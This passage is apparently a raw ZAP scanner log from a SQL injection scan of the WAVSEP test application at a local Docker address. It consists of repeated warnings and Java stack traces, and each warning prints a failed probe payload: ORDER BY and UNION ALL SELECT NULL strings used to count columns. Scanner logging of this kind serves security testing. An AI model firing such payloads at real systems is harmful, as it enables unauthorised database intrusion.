http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963019 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8963020 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') ORDER BY 2998#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') ORDER BY 2998# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8963021 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963022 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963023 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963024 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963025 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963027 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963028 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963029 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963031 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8963036 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at 